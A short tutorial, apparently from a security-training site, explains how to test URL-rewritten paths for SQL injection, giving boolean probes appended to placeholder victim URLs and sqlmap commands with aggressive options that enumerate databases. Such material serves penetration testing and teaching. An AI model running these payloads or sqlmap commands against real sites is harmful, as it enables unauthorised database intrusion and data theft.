
Ready to Start Your Career?

By: Babak Esmaeili
August 31, 2016
How to Test and Exploit SQL Injections in URL Rewrite Rules
By: Babak Esmaeili
August 31, 2016

By: Babak Esmaeili
August 31, 2016

https://victim.com/?id=1
Most everyone knows how to test for SQL injection in this situation ---> http://mysite.com/?id=1' or
http://mysite.com/?id=1 and 2.5=2.5 or
http://mysite.com/?id=1 and 3.4=3.5
and etc.But, in URL rewrites, this UR http://victim.com/?id=1 will become
http://victim.com/1 ,{id is hidden and the parameter 1 is used in url}
For testing SQL injection in these kind of URLs, we just use our payloads as before, but after the parameter :http://victim.com/1' or
http://victim.com/1 and 3.6=3.6
http://victim.com/1 and 3.6=3.77
and etc.The results would be the same as a normal post parameter.For testing SQL injection with SQLMAP, we just use a star in the format. For instance:sqlmap -u "http://victim.com/1*" --random-agent --level 5 --risk 3 --dbs
orsqlmap -u "http://victim.com/content*/1" --random-agent --level 5 --risk 3 --dbs
For injecting in the content parameter, the star sign shows sqlmap where to inject payloads. Happy HackingBuild your Cybersecurity or IT Career
Accelerate in your role, earn new certifications, and develop cutting-edge skills using the fastest growing catalog in the industry